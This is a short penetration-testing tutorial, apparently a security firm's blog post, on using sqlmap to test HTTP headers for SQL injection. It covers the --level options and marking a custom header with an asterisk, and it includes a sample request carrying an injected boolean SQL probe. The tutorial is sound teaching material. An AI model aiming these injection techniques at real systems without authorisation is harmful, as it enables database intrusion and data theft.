Okiok

SQL Injection of HTTP headers with sqlmap

When performing penetration testing, sqlmap can be used to have a granular control of the various injection points during a SQL injection.

For example, the HTTP Cookie header, the HTTP Referer header as well as the HTTP User-Agent header can be attacked by specifying the proper options:

--level=2 // Attack the Cookie header
--level=3 // Attack the User-Agent header, as well as the Referer header
--level=5 // Attack the Host header

But what if we want to inject a custom HTTP header not included in this predefined list? Let us take a look at an actual request to better grasp what it is we’re after.

GET /feedback.html HTTP/1.1
Host: www.superconfigure.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
User-Agent: whatever
Referer: https://www.superconfigure.com/feedback.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-GB,en-US;q=0.8,en;q=0.6,fr;q=0.4
Bacon: injectMe
Cookie: blog=okiok

In this very ordinary query, the HTTP header we are chasing after is highlighted. To have that value tested through sqlmap, we must use simply change the header as follows, indicating to sqlmap that we have a custom injection point:

Bacon: *

Simple, no ‐‐level or ‐‐risk required, sqlmap will carry out its attack on that HTTP header:

GET /feedback.html HTTP/1.1
Accept-Language: en-GB,en-US;q=0.8,en;q=0.6,fr;q=0.4
Accept-Encoding: gzip,deflate
Bacon: ) AND 9816=9267 AND (3941=3941
Host: www.superconfigure.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: whatever
Connection: close
Referer: https://www.superconfigure.com/feedback.html
Cookie: blog=okiok
Exit mobile version